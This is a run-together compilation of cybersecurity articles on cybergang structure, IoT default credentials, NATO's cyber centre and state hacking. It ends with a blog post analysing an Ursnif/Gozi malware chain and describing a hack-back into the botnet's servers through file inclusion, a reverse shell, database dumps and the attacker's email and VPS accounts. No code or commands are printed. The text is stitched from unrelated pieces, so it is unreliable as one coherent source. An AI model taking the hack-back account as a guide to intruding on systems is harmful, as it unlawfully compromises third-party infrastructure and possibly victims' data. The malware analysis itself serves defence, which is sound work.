According to FinExtra, the scenario took the form of an on-site technical and hands-on-keyboard experience. There were 14 participants at CISO and CIO level, along with many more observers from other companies in the financial sector. The aim of the event was to encourage collaboration and information sharing with other teams and organisations to improve collective defences against cyber threats.
Whether it’s a war-gaming
exercise or a table-top event, the goal is the same: to be ready for the worst
ahead of time, and knowing what steps are available to you when bad things
happen for real.
Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks
Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.
Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to that of a corporate enterprise than you think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.
There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.
Current perceptions surrounding Cybergangs Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.
How Cybergangs are using Technology to Work Smarter and Cheaper Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.
The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.
IoT Vulnerabilities on the Rise According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030. With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure. Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.
Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.
Why Cybersecurity Mindsets must Change IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.
To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.
It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.
Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.
In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.
Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.
David Warburton, Senior Threat Research Evangelist with F5 Labs with over 20 years’ experience in IT and security.
The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018. On Saturday 26th January, car services and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disputed its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the malware outbreak was likely caused by a general lack of security patching and anti-virus protection as opposed to anything sophisticated.
According to recent reporting, the North Atlantic Treaty Organization (NATO) announced that its Cyber Operations Center (COC) is expected to be fully staffed and functional by 2023. The new COC marks NATO’s understanding of the importance that cyberspace plays in conflict, particularly in times of political tensions that has resulted in cyber malfeasance that has targeted elections and critical infrastructure. The establishment of the COC is a natural evolution in how to address cyber attacks in a more timely manner by integrating cyber actions with more conventional military capabilities. In early 2014, after notable cyber incidents were a part of international incidents that occurred in Estonia in 2007 and Georgia in 2008, the Alliance updated its cyber defense policy to classify digital attacks as the equivalent of kinetic attacks under its collective security arrangement under Article 5 of the treaty.
In those particular instances, Russia was suspected in orchestrating or at least tacitly supporting the cyber attacks that afflicted both states. Since then, Russia’s alleged cyber activities have only become more brazen in their scale and aggressiveness. From suspected involvement in launching cyber attacks against Ukrainian critical infrastructure to launching a variety of cyber operations to meddle in the elections of foreign governments, Russia has taken advantage of the uncertainty of cyberspace where there is little consensus on key issues such as Internet governance, cyber norms of state behavior, or the criteria by which cyber attacks escalate to a point of war.
NATO has always provided a strong military counterpoint to Russian influence in the European region and projecting a credible threat in cyberspace is an important complement to NATO capabilities. However, previously, NATO didn’t have any of its own cyber weapons, a significant problem given Russia’s perceived position of a near-peer level adversary of the United States. With the establishment of the cyber command, the United States, United Kingdom, and Estonia have offered the Alliance their cyber capabilities. As described in one news article, the alliance hopes to integrate individual nations’ cyber capabilities into alliance operations, coordinated through the COC and under the command of NATO’s top general. With this in hand, it will be interesting to see if this will serve as the deterrent it’s intended to be and how Russia may adjust their cyber activities, particularly against NATO member countries.
However, there is still the lingering problem the Alliance faces with regards to the rules of engagement. Classifying cyber attacks under Article 5 is a start but doesn’t help provide a path forward to how NATO can and should engage and respond to cyber attacks. While this provides NATO a certain flexibility in addressing cyber attacks allowing the Alliance to take each on a case-by-case basis in determining the extent of its response, it does not provide adversarial states an idea of tolerated and intolerable cyber activities. This shortcoming serves only to provide states like Russia enough wiggle-room to continue their offensive cyber operations as long as they don’t cross an undefined threshold. It’s long been hypothesized that attacks crippling critical infrastructures would meet that threshold, but as seen in Ukraine, this bar keeps being pushed a little farther each time.
The COC is a much-needed instrument in NATO’s overall toolbox, strengthening the capacity of the Alliance to deter, and where appropriate, retaliate against cyber attacks. That said, the longer there are no clear lines of what will and will not be deemed acceptable in cyber space will keep the status quo pretty much in place. Once fully operational, the first test of the COC will be how the it will respond and in what proportion to an attack against a member state. And it’s at this time all eyes will turn to Russia to see how it will react and alter how and where it conducts its operations.
There has been recent focus on alleged Iran cyber activity the past few weeks, spurned on by the publication of a vendor report on Iranian operations. Per the vendor’s findings, not only was Iran likely behind the activity that was targeting government and private sector in the Middle East, it was implementing National Security Agency exploits that were stolen and dumped into the public domain by the Shadow Brokers group in April 2017. As recently as late August 2018, Iran is suspected of trying to launch influence operations ahead of the midterm elections. The conclusion is that Iran is increasingly using asymmetric attacks, particularly via cyberspace, as part of its tool box to conduct retaliatory attacks.
The new reporting comes at a time when Russia’s cyber malfeasance has largely dominated the press, due to its influence operations efforts and election shenanigans, not just in the United States but in other countries as well. Prior to the Russia focus, North Korea was the focal point with its suspected cyber activities targeting cryptocurrency, and the SWIFT banking transactions before that. Iran was propelled onto the scene with Operation Ababil
DDoS attacks against U.S. banks, as well as its suspected involvement in the wiper malware incident against Saudi Aramco. Some consider Iran a powerful cyber nation on par or close to it to China and Russia. Others, maintain that Iranian actors are much less sophisticated, preferring to implement “tried-and true tactics while targeting many individuals.” China initially led the state-led cyber espionage activity, which largely was curbed against the United States once the “no hack” pact was agreed to in 2015.
There seems to be a perpetual “revolving door” of news-cycle focus on suspected state activity, with new reports reporting on hostile espionage and exploitation occurring against global targets. The purpose of these appears to track the latest and greatest escapades of these governments using – in most cases – publicly available tools and exploits that are publicly accessible (see Shadow Brokers above) and using vectors that for the most part are routine for any hostile cyber actor (certainly, if a state actor is “sophisticated”, the intimation is that the activity hasn’t been detected as of yet, or the sophisticated tools/exploits haven’t been implemented yet).
Between the ongoing stories of adversarial state activity as aforementioned above and news of smaller nations looking to acquire offensive cyber capabilities, all indications are that media and vendor reporting will continue to push the “hostile state actor as monolith” narrative into the public eye. Yet, like the saying goes, “if everything is important, nothing is important,” which rings with authenticity with regards to state cyber activity. Actual activity or incidents that threaten to disrupt, destroy, degrade, deny, or manipulate data systems or the data resident on them deserve to be pushed to the forefront as they potentially impact everyone at all levels.
But theft of intellectual property and state secrets affect a minority, and rarely if ever will impact everyday citizens. Such vigorous scrutiny and analysis of suspected state activity should apply to the cyber crime ecosystem whose nefarious endeavors directly impact the global population. And while there are isolated incidents of law enforcement efforts arresting groups and individuals or taking down marketplaces, this has failed to put a dent into a global industry that was cited as the second most reported economic crime, according to a 2017 report by the same vendor.
This needs to change and it would be welcome to see such vendors with a wide and deep visibility into the cyber threat space to uncover some of the more “sophisticated” state actors, to apply that precision against a threat intent on exploiting everyone on the planet. Some of the more notable breaches have exposed a high volume of individual data:
2013/14 Yahoo 3 Billion Accounts
2016 Adult Friend Finder 412 Million Accounts
2014 eBay 145 Million Users
2017 Equifax 143 Million User
2008 Heartland Payment Systems 134 Million credit cards
One thing is clear – cyber criminals have proven to be as sophisticated and resourceful as state actors, often times using the same tools and techniques. The fact that this category of cyber actor is not as robustly tracked, and information shared directly to the appropriate authorities is disappointing.
Today I'd like to share a full path analysis including a KickBack attack which took me to gain full access to an entire Ursniff/Gozi BotNet .
In other words: from a simple "Malware Sample" to "Pwn the Attacker Infrastructure".
NB: Federal Police has already been alerted on such a topic as well as National and International CERTs/CSIRT (on August 26/27 2018) . Attacked companies and compromised hosts should be already reached out. If you have no idea about this topic until now it means, with high probability, you/your company is not involved on that threat. I am not going to public disclose the victims IPs.
This disclosure follows the ethical disclosure procedure, which it is close to responsible disclosure procedure but mainly focused on incident rather than on vulnerabilities.
Since blogging is not my business, I do write on my personal blog to share knowledge on Cyber Security, I will describe some of the main steps that took me to own the attacker infrastructure. I will no disclose the found Malware code nor the Malware Command and Control code nor details on attacker's group, since I wont put on future attackers new Malware source code ready to be used.
My entire "Cyber adventure" began from a simple email within a .ZIP file named "Nuovo Documento1.zip" as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041) . Inside the ZIP a .VBS file (sha265: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which for the time being August 21 2018 was totally unknown from VirusTotal (unknown = not yet analysed) was ready to get started through double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like de-obfuscate hidden code (every time it's like a personal challenge). After some hardworking-minutes ( :D ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charged of evading three main AVs such as: Kaspersky Lab, Panda Security and Trend Micro by running simple scans on Microsoft Regedit and dropping and executing additional software.
Indeed if none of searched AV were found on the target system Stage1 was acting as a simple downloader. The specific performed actions follows:
Stage1 was dropping and executing a brand new PE file named: rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admin can use to create download or upload jobs and monitor their progress over time. This technique have been widely used by Anunak APT during bank frauds on the past few years.
The Stage2 analysis (huge step ahead here) brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section within high entropy on it. It's a significative indication of a Decrypter activity.
Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section
Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way many AV engines were not able to detect it since signature was changing from original payload. Finally the de-packed payload presented many interesting features; for example it was weaponised with evasion techniques such as: timing delay (through sleep), loopdelay by calling 9979141 times GetSystemTimeAsFileTime API, BIOSversioning harvesting, systemmanufacturerinformation and systemfingerprinting to check if it was running on virtual or physical environment. It installed itself on windows auto-run registry to get persistence on the victim machine. The following action was performed while running in background flag:
Stage3 finally connects back to C2s once checked its own ip address. Two main C2s were observed:
C2 level_1 (for domains and ips check the IoC section). The Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
C2 level_2 (for domains and ips check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to give stolen information. It 's a Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, getting user clipboard and by performing main in the browser attack against main web sites such as: paypal gmail, microsoft and many online services.
So far so good. Everything looks like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, on my personal point of view, was "hand made" and pretty "young" as implementation by meaning of HTML with not client side controls, no clickjacking controls and not special login tokens. According to Yoroi's mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and to collaborate to local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight the Cyber Crime.
Fortunately I spotted a file inclusion vulnerability in Command and Control which took me in ! The following image shows a reverse shell I spawned on Attacker's command and control.
Reverse Shell On C2 Stage_1
Now, I was able to download the entire Command and Control Source Code (php) and study it ! The study of this brand new C2 took me to the next level. First of all I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) on it, according to Anunak APT report made by group-ib.
Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).
C2 level_1 Database
Additional investigations on database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least additional two layers of C2 were present. While the level_1 was weaponising the malware implant the level_2 was collecting information from victims. Thanks to the source code study has been possibile to found more 0Days to be used against C2 and in order to break into the C2 level_2 . Now I was able to see encrypted URLs coming from infected hosts. Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a "test" connection from the Attacker and focus to decrypt such a connection. Fortunately everything needed was written on command and control source code. In the specific case the following function was fundamental to get to clear text !
URL Decryption Function
The eKey was straight on the DB and the decryption function was quite easy to reverse. Finally it was possible to figured out how to decrypt the attacker testing string (the first transaction available on logs) and voilà, it was possible to checkin in attacker's email :D !
Attacker eMail: VPS credentials
Once "in" a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !
Attacker VPS Environment
Sharing these results for free would make vendors (for example: AV companies, Firewall companies, IDS companies and son on) able to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might rise our voice against cyber criminals !
In this post I described the main steps that took me to gain access to a big Ursniff/Gozi Botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on attacker infrastructure). The threat appeared very well structured, Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up from a criminal organisation and not from a single person.
The following graph shows the victim distribution on August 2018. The main targets currently are USA with a 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims on August 2018 are several thousands.
Victims Distribution on August 24 2018
During the analyses was interesting to observe attacker was acquiring domains from an apparent "black market"where many actors where selling and buying "apparent compromised domains" (no evidence on this last sentence, only feeling). The system (following picture) looks like a trading platform within public API that third party systems can operate such as stock operators.
Apparent Domain BlackMarket
Hope you enjoyed the reading.
IoCs: Following a list of interesting artefacts that would be helpful to block and prevent the described threat.